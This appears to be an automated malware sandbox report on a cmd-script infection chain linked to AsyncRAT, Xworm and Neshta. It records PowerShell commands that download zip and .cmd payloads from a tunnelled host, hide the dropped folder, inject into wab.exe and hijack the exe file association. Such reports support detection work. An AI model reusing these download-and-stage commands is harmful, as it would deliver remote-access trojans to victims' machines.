PID 2312 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2312 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2312 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2312 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2312 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2312 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 3064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2500 wrote to memory of 3064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2500 wrote to memory of 3064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2500 wrote to memory of 3064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2312 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2312 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2312 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2500 wrote to memory of 1784 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2500 wrote to memory of 1784 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2500 wrote to memory of 1784 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2500 wrote to memory of 1784 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2312 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 1372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2312 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2312 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2312 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://floor-contemporary-genius-accommodation.trycloudflare.com/VB.pdf

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2500 CREDAT:275457 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2500 CREDAT:275463 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/update.cmd' -OutFile 'C:\Users\Admin\Downloads\update.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }"

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\Downloads\Python"

Network

Country Destination Domain Proto
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
US 104.16.231.132:443 floor-contemporary-genius-accommodation.trycloudflare.com tcp
US 104.16.231.132:443 floor-contemporary-genius-accommodation.trycloudflare.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.152:80 apps.identrust.com tcp
NL 23.63.101.153:80 apps.identrust.com tcp
US 104.16.231.132:443 floor-contemporary-genius-accommodation.trycloudflare.com tcp
US 104.16.231.132:443 floor-contemporary-genius-accommodation.trycloudflare.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2660-27-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/2660-29-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

memory/2660-28-0x000000001B3A0000-0x000000001B682000-memory.dmp

memory/2660-30-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2660-32-0x000000000268B000-0x00000000026F2000-memory.dmp

memory/2660-31-0x0000000002684000-0x0000000002687000-memory.dmp

memory/2660-34-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2660-33-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e36ab61c09d05a420e0082abbce6a9a1
SHA1 5fee34b63238350f2522f0ee49968d72edb83427
SHA256 6f598241298c156cadadade489728063c03678d8b6d16e30515899807621dcd5
SHA512 e97743ab45b98dcd1bd68a4f4606810f05b3998a6f26278afa20d3c193ff47b21212ecc24cfb55a4ba69989846b8228c271297ff6a46f049deaec0bd239a5b03

memory/3024-41-0x0000000002760000-0x0000000002768000-memory.dmp

memory/3024-40-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab8825.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar8984.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 85f11af5e137746d2cb858d12bfa9991
SHA1 07853321fb415a033a424a0e51d42d34e5dc69e6
SHA256 9433148b79013c46dd2d86d29debfa463bb8d1a777ed26569c7934eadde5cfd1
SHA512 1d2a0b9e4dcadbd218de4541f1831b9e355e06206c6563e26d535ec557f5f6632d4f2dbf845b07aaa6153bb57fec62934d327068e26d707617cd23a08ce58b26

memory/1540-166-0x000000001B290000-0x000000001B572000-memory.dmp

memory/1540-167-0x0000000002380000-0x0000000002388000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7edb8569ef845eaf0f678b31e4aabe3
SHA1 339fe1a92d8117ae43eaa4aa53c2ec51a3df8cff
SHA256 c76708c738c78e26bfd74cea9cb7a5cd1e2a343a1304765948b1f4eea6bb7d9d
SHA512 c1de74545ab7ec821d0503aadfa24ed6f5fcf2044d70dc91d362e44f631928655c15ce5fed74023a408e18fe394b9f3a8608c9341d8330c03ab46177a3d9993d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 41d247997ff4b8b68df09d32bbe65f5c
SHA1 a4aec304ab2488a8d8745099f5eb6ce847720f97
SHA256 18242c5dd3b9751dfab98512bb3e0e7e0f6c3232e7cc8ee6b024b6033fc0b4e4
SHA512 65c5d34f7dbf1c95edcf7749fd870dfaada7fd96e66f1c17bf8112446ccc02a94e1e45b28a48215a3a67b93241fb79927cb59d9e246adb4db158fbbf94a83dc8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14c3489eccdb450d457d9591173bb31b
SHA1 b196cc1599ccdfa16c1a71bfc2870e47c101fb21
SHA256 58dec1abdb13c3f8b9c47223c25e439b1e324bde177abb7faf5cfa2841729746
SHA512 5646043892bde550a1ce95b40d9055fa725cbfea34922bfcfc96de1f7a351000bbfb2b268825b7628774b279f398eee9097880412fe060131a8ed1e54ab5887a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61

MD5 5ae8478af8dd6eec7ad4edf162dd3df1
SHA1 55670b9fd39da59a9d7d0bb0aecb52324cbacc5a
SHA256 fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca
SHA512 a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61

MD5 b27c914cb41ddc0c62430abb0e7c989a
SHA1 a30fa492bb5230a804830a26e9aa36805636a025
SHA256 b2df4c26c17b598750059731fb90a36f044db1ccb3edf5555ca404127097de94
SHA512 f8ba9a71088ffac23c89797a2f4b79809369c1b969fd3b834f3889657d419e7c0d240b9fea0233358b6b372b39fbcc81dceafa403a073788d76d2007c5e42d88

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a3ec0ff43a843fd2c07d1a3bbdbe3df3
SHA1 3d47240d5ad4c4f44c930b5d114781111275fafa
SHA256 24c2bc46454199dbedd8e15d8d14fb7f63e6938e779a150f6a61b83bb9e81b05
SHA512 3fcfa0a2a1ca203c3467703f2a5c84a14788e79dd5fbebe8b5fa7874c677d804307d3fe4aed7efc6b0973da929618c1267caa7ccd6b9f36d4db7ae9b33a33040

memory/1288-250-0x000000001B230000-0x000000001B512000-memory.dmp

memory/1288-251-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

memory/2636-258-0x000000001B220000-0x000000001B502000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2636-259-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2660-269-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

memory/2660-270-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/1372-276-0x000000001B320000-0x000000001B602000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\UserCache.bin

MD5 62a2e07ceca4e1bd129047a85e535970
SHA1 78f0c188864e915977e2b98f11d167d4859c7379
SHA256 48731eb2f2aed9f0b266a56a83eae2bb11620273f04ec6ed62708ad306656bd5
SHA512 badad1779e55e6ffc9763e9360bfd792e4316bedc042271aa6bd39a3d73715d8e96a5c14e1da564f4c220bb50b7cca622401e71e5b5580f0f4761e5035313e7f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 eedcffad9d4dc922f721611acac1c8ca
SHA1 c4df756db41e76811b61c87b63b6119bd40bf87d
SHA256 8859f8be20f1dcf4495616f56691a9acd56ad1603239cab7bdb2cdd8577c8560
SHA512 1ff7dc8304a1cca6a34e7b35228dd678d1f844c7ea3636b57d327978d7e7d0fecc9979f8e6e3e1c8356b3c39d9a12c2f2504c444b9a8b372946e2ed38cf53fcc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 008947d9c165ec8fbd6058a2bc6dc47e
SHA1 420aa14bef8518b1d0090c3ae050b18b92ba40ca
SHA256 2bdcb2d805742b5b83cd0a2103f4af6a024af307429bf30ce4ce654bee5580fb
SHA512 16e0a985cc2422f76b44c0e2987aa846b764af9a10ab88c4910fb9bb3a129479f813fc0fa8d688176627e96e187ba8f1f458074811e52a38720910d2e6de535b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 56827a0d7736700889fdf699f5b2116b
SHA1 61f3124f344155c5ee08dd331d28bbf80529f240
SHA256 a877081a6dea94c6534de937b5e9a8ff012eb935786e091799dae6d27efb4497
SHA512 0483a3408331e240e4211ba7cae4f1faf7aba9531a085773a32dde0e9794b327f8b25e3456eca4253df959345239e4421c3d6db285f9a24d34fdd7401c8b48da

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-23 18:31

Reported

2024-05-23 19:05

Platform

win10v2004-20240508-en

Max time kernel

1798s

Max time network

1801s

Command Line

C:\Windows\Explorer.EXE

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Neshta

persistence spyware neshta

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3316 created 3448 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 2172 created 3448 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 5764 created 3448 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 6036 created 3448 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 6044 created 3448 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1636 set thread context of 5364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 424 set thread context of 5760 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1320 set thread context of 1580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3788 set thread context of 5608 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MIA062~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MI391D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Program Files (x86)\windows mail\wab.exe N/A
